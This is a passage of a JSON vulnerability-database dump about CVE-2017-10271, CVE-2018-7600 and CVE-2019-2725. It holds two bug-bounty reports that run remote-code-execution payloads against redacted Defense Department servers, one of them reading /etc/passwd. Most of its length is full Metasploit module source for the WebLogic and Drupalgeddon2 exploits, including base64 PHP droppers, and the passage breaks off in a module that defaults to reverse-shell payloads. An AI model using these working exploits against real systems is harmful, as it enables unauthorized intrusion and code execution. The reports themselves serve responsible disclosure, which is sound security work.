"description": "**Summary:**\nHappy Friday! The server at `\u2588\u2588\u2588\u2588\u2588\u2588` is vulnerable to CVE-2017-10271 \"Oracle WebLogic Server Remote Command Execution\".\n\n**Description:**\nThe following request takes 12 seconds (12000 milliseconds) to complete:\n```\nPOST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nContent-Length: 423\ncontent-type: text/xml\nAccept-Encoding: gzip, deflate, compress\nAccept: */*\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java class=\"java.beans.XMLDecoder\">\n <object class=\"java.lang.Thread\" method=\"sleep\">\n <long>12000</long>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n```\nThis proves that I have Java code execution on the remote server. \n\nref: https://techblog.mediaservice.net/2018/07/cve-2017-10271-oracle-weblogic-server-remote-command-execution-sleep-detection-payload/\n\nPublic exploits for this exist: https://github.com/c0mmand3rOpSec/CVE-2017-10271\nI was not able to use that script with a `ping` command, which might have been blocked by preventing outbound connections.\n\n## Suggested Mitigation/Remediation Actions\nPatch & possibly don't allow external access.\n\n## Impact\n\nCritical, RCE.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-05-10T22:23:31", "type": "hackerone", "title": "U.S. Dept Of Defense: RCE on \u2588\u2588\u2588\u2588\u2588 via CVE-2017-10271", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2019-07-01T19:54:20", "id": "H1:576887", "href": "https://hackerone.com/reports/576887", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-04-09T01:28:40", "bounty": 0.0, "description": "## Summary \nDue to an outdated Drupal version, remote code execution is possible on `www.\u2588\u2588\u2588\u2588\u2588` via CVE-2018-7600. \n\n## Description\nDrupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. \n\nVulnerable Host:\n * `www.\u2588\u2588\u2588`\n\nVisiting `https://www.\u2588\u2588\u2588/\u2588\u2588\u2588` we can see that we have a Drupal with version 7.54, which was updated the last time in 2017-02-01.\n\nThere are several critical and highly critical vulnerabilities known for this version (see `https://api.drupal.org/api/drupal/\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/7.x` and `https://www.drupal.org/security`). Among them is `SA-CORE-2018-002` (CVE-2018-7600), which I will demonstrate here. \n\nNote: I am reporting this here, since the page `https://www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588` seems to belong to the \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588, which belongs to the DOD. The footer further states: `\u2588\u2588\u2588\u2588\u2588\u2588. [...]`\n\n## Step-by-step Reproduction Instructions\n\n1. Download the git repository with the exploit: `git clone https://github.com/dreadlocked/Drupalgeddon2.git && cd Drupalgeddon2`\n * Install dependencies if necessary `gem install nokogiri`\n\n2. Run the exploit with ruby `ruby drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/ -v 7 -c id --form user/login`\n\nParameters explanation: \n```\n-u, --url URL Service URL\n-v, --version VERSION Target Drupal version {7,8}\n-c, --command COMMAND Command to execute\n--form Form to attack, by default '/user/password' in Drupal 7 \n```\nThe above command outputs:\n```\nroot@5b08dc005375:/Drupalgeddon2# ruby drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588/ -v 7 -c id --form user/login\ndrupalgeddon2-customizable-beta.rb:184: warning: URI.escape is obsolete\n[i] Requesting: www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588//user/password/?name[%23post_render][]=passthru&name[%23markup]=id&name[%23type]=markup\n[i] POST: form_id=user_pass&_triggering_element_name=name\n[i] 200\n[*] Obtained build id!: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\ndrupalgeddon2-customizable-beta.rb:220: warning: URI.escape is obsolete\ndrupalgeddon2-customizable-beta.rb:221: warning: URI.escape is obsolete\n[i] Requesting: www.\u2588\u2588\u2588\u2588\u2588/file/ajax/name/%23value/\u2588\u2588\u2588\u2588\u2588\u2588\n[i] POST: form_build_id=\u2588\u2588\u2588\u2588\u2588\n[i] Response code: 200\nuid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0\nroot@5b08dc005375:/Drupalgeddon2# \n```\nAs we can see, we successfully executed the `id` command, which responded with `uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0`\n\nI am also providing the output of `/etc/passwd` which I obtained with command \n```\nruby drupalgeddon2-customizable-beta.rb -u https://www.\u2588\u2588\u2588\u2588\u2588\u2588/ -v 7 -c \"cat /etc/passwd\" --form user/login\n```\nOutput: \n```\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\n```\n\n## Resources\n * https://api.drupal.org/api/drupal/\u2588\u2588\u2588\u2588\u2588/7.x\n * https://www.drupal.org/security\n * https://github.com/dreadlocked/Drupalgeddon2\n * https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600\n * https://www.drupal.org/sa-core-2018-002\n\n## Mitigation/Remediation Actions\nUpgrade to the most recent version of Drupal 7 core.\n\n## Impact\n\nCritical - Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-12-21T07:51:14", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2018-7600] Remote Code Execution due to outdated Drupal server on www.\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2021-03-24T20:24:17", "id": "H1:1063256", "href": "https://hackerone.com/reports/1063256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T09:22:36", "description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check and will not be used when executing the exploit itself.\n", "cvss3": {}, "published": "2018-01-05T20:05:21", "type": "metasploit", "title": "Oracle WebLogic wls-wsat Component Deserialization RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2022-03-09T23:28:25", "id": "MSF:EXPLOIT-MULTI-HTTP-ORACLE_WEBLOGIC_WSAT_DESERIALIZATION_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/oracle_weblogic_wsat_deserialization_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n # include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE',\n 'Description' => %q(\n The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module\n 'Luffin', # Proof of Concept\n 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery\n ],\n 'References' =>\n [\n ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin\n ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept\n ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit\n ['CVE', '2017-10271'],\n ['EDB', '43458']\n ],\n 'Platform' => %w{ win unix },\n 'Arch' => [ ARCH_CMD ],\n 'Targets' =>\n [\n [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],\n [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]\n ],\n 'DisclosureDate' => '2017-10-19',\n # Note that this is by index, rather than name. It's generally easiest\n # just to put the default at the beginning of the list and skip this\n # entirely.\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),\n OptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]),\n OptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]),\n # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])\n ])\n end\n\n def cmd_base\n if target['Platform'] == 'win'\n return 'cmd'\n else\n return '/bin/sh'\n end\n end\n\n def cmd_opt\n if target['Platform'] == 'win'\n return '/c'\n else\n return '-c'\n end\n end\n\n\n #\n # This generates a XML payload that will execute the desired payload on the RHOST\n #\n def exploit_process_builder_payload\n # Generate a payload which will execute on a *nix machine using /bin/sh\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <void class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>#{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>#{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>#{payload.encoded.encode(xml: :text)}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # This builds a XML payload that will generate a HTTP GET request to our SRVHOST\n # from the target machine.\n #\n def check_process_builder_payload\n xml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <void id=\"url\" class=\"java.net.URL\">\n <string>#{get_uri.encode(xml: :text)}</string>\n </void>\n <void idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </void>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>}\n end\n\n #\n # In the event that a 'check' host responds, we should respond randomly so that we don't clog up\n # the logs too much with a no response error or similar.\n #\n def on_request_uri(cli, request)\n random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'\n send_response(cli, random_content)\n\n @received_request = true\n end\n\n #\n # The exploit method connects to the remote service and sends a randomly generated string\n # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive\n # the response from. This is based off of the exploit technique from\n # exploits/windows/novell/netiq_pum_eval.rb\n #\n # This doesn't work as is because MSF cannot mix HttpServer and HttpClient\n # at the time of authoring this\n #\n # def check\n # start_service\n #\n # print_status('Sending the check payload...')\n # res = send_request_cgi({\n # 'method' => 'POST',\n # 'uri' => normalize_uri(target_uri.path),\n # 'data' => check_process_builder_payload,\n # 'ctype' => 'text/xml;charset=UTF-8'\n # }, datastore['TIMEOUT'])\n #\n # print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\")\n #\n # waited = 0\n # until @received_request\n # sleep 1\n # waited += 1\n # if waited > datastore['HTTP_DELAY']\n # cleanup_service\n # return Exploit::CheckCode::Safe\n # end\n # end\n #\n # cleanup_service\n # return Exploit::CheckCode::Vulnerable\n # end\n\n #\n # The exploit method connects to the remote service and sends the specified payload\n # encapsulated within a SOAP XML body.\n #\n def exploit\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'data' => exploit_process_builder_payload,\n 'ctype' => 'text/xml;charset=UTF-8'\n }, datastore['TIMEOUT'])\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-24T09:19:13", "description": "This module exploits a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n", "cvss3": {}, "published": "2018-04-14T05:22:30", "type": "metasploit", "title": "Drupal Drupalgeddon 2 Forms API Property Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-UNIX-WEBAPP-DRUPAL_DRUPALGEDDON2-", "href": "https://www.rapid7.com/db/modules/exploit/unix/webapp/drupal_drupalgeddon2/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Drupal\n # XXX: CmdStager can't handle badchars\n include Msf::Exploit::PhpEXE\n include Msf::Exploit::FileDropper\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection',\n 'Description' => %q{\n This module exploits a Drupal property injection in the Forms API.\n\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.\n },\n 'Author' => [\n 'Jasper Mattsson', # Vulnerability discovery\n 'a2u', # Proof of concept (Drupal 8.x)\n 'Nixawk', # Proof of concept (Drupal 8.x)\n 'FireFart', # Proof of concept (Drupal 7.x)\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2018-7600'],\n ['URL', 'https://www.drupal.org/sa-core-2018-002'],\n ['URL', 'https://greysec.net/showthread.php?tid=2912'],\n ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],\n ['URL', 'https://github.com/a2u/CVE-2018-7600'],\n ['URL', 'https://github.com/nixawk/labs/issues/19'],\n ['URL', 'https://github.com/FireFart/CVE-2018-7600']\n ],\n 'DisclosureDate' => '2018-03-28',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'linux'],\n 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Payload' => {'BadChars' => '&>\\''},\n 'Targets' => [\n #\n # Automatic targets (PHP, cmd/unix, native)\n #\n ['Automatic (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_memory\n ],\n ['Automatic (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Type' => :php_dropper\n ],\n ['Automatic (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory\n ],\n ['Automatic (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 7.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 7.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_memory\n ],\n ['Drupal 7.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :php_dropper\n ],\n ['Drupal 7.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Rex::Version.new('7'),\n 'Type' => :unix_memory\n ],\n ['Drupal 7.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('7'),\n 'Type' => :linux_dropper\n ],\n #\n # Drupal 8.x targets (PHP, cmd/unix, native)\n #\n ['Drupal 8.x (PHP In-Memory)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :php_memory\n ],\n ['Drupal 8.x (PHP Dropper)',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :php_dropper\n ],\n ['Drupal 8.x (Unix In-Memory)',\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Version' => Rex::Version.new('8'),\n 'Type' => :unix_memory\n ],\n ['Drupal 8.x (Linux Dropper)',\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Version' => Rex::Version.new('8'),\n 'Type' => :linux_dropper\n ]\n ],\n 'DefaultTarget' => 0, # Automatic (PHP In-Memory)\n 'DefaultOptions' => {'WfsDelay' => 2}, # Also seconds between attempts\n 'Notes' => {'AKA' => ['SA-CORE-2018-002', 'Drupalgeddon 2']}\n ))\n\n register_options([\n OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']),\n OptBool.new('DUMP_OUTPUT', [false, 'Dump payload command output', false])\n ])\n\n register_advanced_options([\n OptString.new('WritableDir', [true, 'Writable dir for droppers', '/tmp'])\n ])\n end\n\n def check\n checkcode = CheckCode::Unknown\n\n @version = target['Version'] || drupal_version\n\n unless @version\n vprint_error('Could not determine Drupal version to target')\n return checkcode\n end\n\n vprint_status(\"Drupal #{@version} targeted at #{full_uri}\")\n checkcode = CheckCode::Detected\n\n changelog = drupal_changelog(@version)\n\n unless changelog\n vprint_error('Could not determine Drupal patch level')\n return checkcode\n end\n\n case drupal_patch(changelog, 'SA-CORE-2018-002')\n when nil\n vprint_warning('CHANGELOG.txt no longer contains patch level')\n when true\n vprint_warning('Drupal appears patched in CHANGELOG.txt')\n checkcode = CheckCode::Safe\n when false\n vprint_good('Drupal appears unpatched in CHANGELOG.txt')\n checkcode = CheckCode::Appears\n end\n\n # NOTE: Exploiting the vuln will move us from \"Safe\" to Vulnerable\n token = rand_str\n res = execute_command(token, func: 'printf')\n\n return checkcode unless res\n\n if res.body.start_with?(token)\n vprint_good('Drupal is vulnerable to code execution')\n checkcode = CheckCode::Vulnerable\n end\n\n checkcode\n end\n\n def exploit\n unless @version\n print_warning('Targeting Drupal 7.x as a fallback')\n @version = Rex::Version.new('7')\n end\n\n if datastore['PAYLOAD'] == 'cmd/unix/generic'\n print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')\n # XXX: Naughty datastore modification\n datastore['DUMP_OUTPUT'] = true\n end\n\n # NOTE: assert() is attempted first, then PHP_FUNC if that fails\n case target['Type']\n when :php_memory\n execute_command(payload.encoded, func: 'assert')\n\n sleep(wfs_delay)\n return if session_created?\n\n # XXX: This will spawn a *very* obvious process\n execute_command(\"php -r '#{payload.encoded}'\")\n when :unix_memory\n execute_command(payload.encoded)\n when :php_dropper, :linux_dropper\n dropper_assert\n\n sleep(wfs_delay)\n return if session_created?\n\n dropper_exec\n end\n end\n\n def dropper_assert\n php_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{rand_str}.php\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # Stage 1 decodes the PHP and writes it to disk\n stage1 = %Q{\n file_put_contents(\"#{php_file}\", base64_decode(\"#{dropper}\"));\n }\n\n # Stage 2 executes said PHP in-process\n stage2 = %Q{\n include_once(\"#{php_file}\");\n }\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Hopefully pop our shell with assert()\n execute_command(stage1.strip, func: 'assert')\n execute_command(stage2.strip, func: 'assert')\n end\n\n def dropper_exec\n php_file = \"#{rand_str}.php\"\n tmp_file = Pathname.new(\n \"#{datastore['WritableDir']}/#{php_file}\"\n ).cleanpath\n\n # Return the PHP payload or a PHP binary dropper\n dropper = get_write_exec_payload(\n writable_path: datastore['WritableDir'],\n unlink_self: true # Worth a shot\n )\n\n # Encode away potential badchars with Base64\n dropper = Rex::Text.encode_base64(dropper)\n\n # :unlink_self may not work, so let's make sure\n register_file_for_cleanup(php_file)\n\n # Write the payload or dropper to disk (!)\n # NOTE: Analysis indicates > is a badchar for 8.x\n execute_command(\"echo #{dropper} | base64 -d | tee #{php_file}\")\n\n # Attempt in-process execution of our PHP script\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, php_file)\n )\n\n sleep(wfs_delay)\n return if session_created?\n\n # Try to get a shell with PHP CLI\n execute_command(\"php #{php_file}\")\n\n sleep(wfs_delay)\n return if session_created?\n\n register_file_for_cleanup(tmp_file)\n\n # Fall back on our temp file\n execute_command(\"echo #{dropper} | base64 -d | tee #{tmp_file}\")\n execute_command(\"php #{tmp_file}\")\n end\n\n def execute_command(cmd, opts = {})\n func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'\n\n vprint_status(\"Executing with #{func}(): #{cmd}\")\n\n res =\n case @version.to_s\n when /^7\\b/\n exploit_drupal7(func, cmd)\n when /^8\\b/\n exploit_drupal8(func, cmd)\n end\n\n return unless res\n\n if res.code == 200\n print_line(res.body) if datastore['DUMP_OUTPUT']\n else\n print_error(\"Unexpected reply: #{res.inspect}\")\n end\n\n res\n end\n\n def exploit_drupal7(func, code)\n vars_get = {\n 'q' => 'user/password',\n 'name[#post_render][]' => func,\n 'name[#markup]' => code,\n 'name[#type]' => 'markup'\n }\n\n vars_post = {\n 'form_id' => 'user_pass',\n '_triggering_element_name' => 'name'\n }\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n\n return res unless res && res.code == 200\n\n form_build_id = res.get_html_document.at(\n '//input[@name = \"form_build_id\"]/@value'\n )\n\n return res unless form_build_id\n\n vars_get = {\n 'q' => \"file/ajax/name/#value/#{form_build_id.value}\"\n }\n\n vars_post = {\n 'form_build_id' => form_build_id.value\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def exploit_drupal8(func, code)\n # Clean URLs are enabled by default and \"can't\" be disabled\n uri = normalize_uri(target_uri.path, 'user/register')\n\n vars_get = {\n 'element_parents' => 'account/mail/#value',\n 'ajax_form' => 1,\n '_wrapper_format' => 'drupal_ajax'\n }\n\n vars_post = {\n 'form_id' => 'user_register_form',\n '_drupal_ajax' => 1,\n 'mail[#type]' => 'markup',\n 'mail[#post_render][]' => func,\n 'mail[#markup]' => code\n }\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'vars_get' => vars_get,\n 'vars_post' => vars_post\n )\n end\n\n def rand_str\n Rex::Text.rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/drupal_drupalgeddon2.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-08T00:44:32", "description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3 interface can send a malicious SOAP request to the interface WLS AsyncResponseService to execute code on the vulnerable host.\n", "cvss3": {}, "published": "2019-04-26T01:03:17", "type": "metasploit", "title": "Oracle Weblogic Server Deserialization RCE - AsyncResponseService", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2022-07-07T23:05:56", "id": "MSF:EXPLOIT-MULTI-MISC-WEBLOGIC_DESERIALIZE_ASYNCRESPONSESERVICE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/misc/weblogic_deserialize_asyncresponseservice/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ',\n 'Description' => %q{\n An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a malicious SOAP request to the interface WLS AsyncResponseService\n to execute code on the vulnerable host.\n },\n 'Author' => [\n 'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module\n ],\n 'License' => MSF_LICENSE,\n 'References' => [\n ['CVE', '2019-2725'],\n ['CNVD-C', '2019-48814'],\n ['URL', 'http://www.cnvd.org.cn/webinfo/show/4999'],\n ['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'],\n ['URL', 'https://twitter.com/F5Labs/status/1120822404568244224']\n ],\n 'Privileged' => false,\n 'Platform' => %w[unix win solaris],\n 'Targets' => [\n [\n 'Unix',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }\n }\n ],\n [\n 'Windows',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }\n }\n ],\n [\n 'Solaris',\n {\n 'Platform' => 'solaris',\n 'Arch' => ARCH_CMD,\n 'DefaultOptions' => { 